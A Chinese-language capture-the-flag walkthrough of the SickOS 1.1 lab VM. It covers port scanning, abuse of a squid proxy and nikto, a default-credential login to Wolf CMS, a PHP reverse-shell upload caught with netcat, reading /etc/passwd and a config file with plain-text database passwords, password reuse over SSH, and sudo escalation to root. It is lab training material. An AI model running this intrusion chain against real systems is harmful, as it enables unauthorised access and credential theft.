nmap 先掃一遍目標
root@kali:~/_Sec/sick# nmap -sS -Pn 192.168.2.164 -p-
...
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
用瀏覽器連上3128 port之後,會發現架了一個squid-proxy
透過這個proxy就能用瀏覽器連上 http://192.168.2.164
這個首頁的原始碼空無一物,先拿nikto來掃看看有沒有漏洞
root@kali:~/_Sec/sick# nikto -h http://192.168.2.164 -useproxy http://192.168.2.164:3128
...
+ "robots.txt" contains 1 entry which should be manually viewed.掃描結果發現有robots.txt,打開來看會得到/wolfcms這個路徑,是個用wolfcms架的blog
google wolfcms exploit之後,看到了這個漏洞
但要實際運用必須要先能夠登入,於是來到了登入畫面。
然後!!!!!
猜了五分鐘,最後終於用admin:admin成功登入了
再來就要嘗試剛剛找到的poc有沒有效果
上傳一個revershell.php,並在攻擊端設好等待連線之後,再從瀏覽器去瀏覽剛剛上傳的php檔
就成功拿到www-data的shell了
root@kali:~/_Sec/sick# nc -lp 4112
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
23:58:32 up 4:11, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$檢查一下/etc/passwd,發現有個sickos的帳號
www-data@SickOs:/$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash到sickos的家目錄逛一下,.bashrc和.profile沒甚麼有用的資訊,.bash_history沒權限
接著去逛逛架站的/var/www目錄,在/wolfcms/config.php會發現連入mysql用的帳密
www-data@SickOs:/var/www/wolfcms$ cat config
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');用這組帳密登入mysql後到處逛逛,最後在mysql.user這張表發現從sickos這個host登入用的帳密
www-data@SickOs:/var/www/wolfcms$ mysql -uroot -pjohn@123
...
mysql> select host,user,password from mysql.user;
select host,user,password from mysql.user;
+-----------+------------------+-------------------------------------------+
| host | user | password |
+-----------+------------------+-------------------------------------------+
| localhost | root | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| sickos | root | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| 127.0.0.1 | root | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| ::1 | root | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| localhost | debian-sys-maint | *CB98094782C386F2459D65D97B17D1DE15D1654B |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)雖然密碼是加密過的,不過跟我們知道目前登入mysql用的密碼就是john@123
用這組密碼就能成功從ssh登入sickos的帳號了
www-data@SickOs:/var/www/wolfcms$ ssh sickos@192.168.2.164
ssh sickos@192.168.2.164
The authenticity of host '192.168.2.164 (192.168.2.164)' can't be established.
ECDSA key fingerprint is 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '192.168.2.164' (ECDSA) to the list of known hosts.
sickos@192.168.2.164's password: john@123
...
Last login: Fri Dec 18 22:52:51 2015 from 192.168.2.145
sickos@SickOs:~$登入後就可以看到.bash_history裡有用過sudo su的紀錄
執行後就拿到root的權限,最後就是抓flag了
sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123
root@SickOs:/home/sickos# ls -al /root
ls -al /root
total 40
drwx------ 3 root root 4096 Dec 6 21:14 .
drwxr-xr-x 22 root root 4096 Sep 22 08:13 ..
-rw-r--r-- 1 root root 96 Dec 6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw------- 1 root root 3783 Dec 18 23:57 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Sep 22 08:33 .cache
-rw------- 1 root root 22 Dec 5 06:24 .mysql_history
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-rw------- 1 root root 5230 Dec 6 21:14 .viminfo
root@SickOs:/home/sickos# cat /root/a0216ea4d51874464078c618298b1367.txt
cat /root/a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
root@SickOs:/home/sickos#